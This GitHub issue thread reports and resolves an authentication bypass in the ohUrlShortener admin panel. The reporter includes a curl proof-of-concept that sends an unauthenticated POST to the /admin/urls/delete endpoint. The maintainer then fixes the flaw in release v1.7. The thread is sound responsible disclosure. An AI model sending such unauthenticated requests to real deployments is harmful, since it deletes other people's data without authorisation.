### ISSUE TITLE
在管理端点中发现未经授权的访问。

### ISSUE THREAD

**Issue by douglas-oliveira-tc** [barats/ohUrlShortener#11]
I was implementing your project for an internal experimentation, and found a critical issue that allows unauthenticated users to bypass auth controls.

**Steps to reproduce:**

`curl -i -s -k -X $'POST' -H $'Host: admin.ohUrlShortener.com' -H $'Referer: http://admin.ohUrlShortener.com/admin/urls' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Content-Length: 18' --data-binary $'short_url=Ak3vaj58' $'http://admin.ohUrlShortener.com/admin/urls/delete'`

![image](https://user-images.githubusercontent.com/81173830/191312775-7fdc01e8-aefa-48b9-b883-aba37c4f450d.png)

All examples were run in my environment, the address used is only for illustration purposes.

**Comment by barats** [comment]
I'll check for this issue, TODAY.

**Comment by barats** [comment]
Turns out, it was my bad. Sorry about it. 

Already fixed this issue and drafted a new release: https://github.com/barats/ohUrlShortener/releases/tag/v1.7 

![image](https://user-images.githubusercontent.com/12779645/191411546-f9ccb4a8-9550-4a48-b5df-d602d6fbeed8.png)

**Comment by douglas-oliveira-tc** [comment]
That's great, thanks a lot!

**Comment by barats** [comment]
> That's great, thanks a lot!

I should thank you for reporting this issue.
